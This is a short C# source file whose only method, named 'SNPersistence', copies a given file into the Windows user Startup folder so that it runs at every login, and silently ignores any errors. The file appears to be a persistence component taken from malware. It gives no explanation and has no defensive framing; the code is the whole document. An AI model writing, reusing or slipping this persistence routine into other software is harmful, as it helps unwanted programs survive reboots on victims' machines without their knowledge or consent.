 using System;
 public class S
 {
		public static bool SNPersistence(string input)
        {
            string SRP = Environment.GetFolderPath(Environment.SpecialFolder.Startup);
            string S = "\\" + System.IO.Path.GetFileName(input);
            try
            {
                if (!System.IO.File.Exists(SRP + S))
                {
                    System.IO.File.Copy(input, SRP + S);
                }
                return true;
            }
            catch { return false; }
        }
}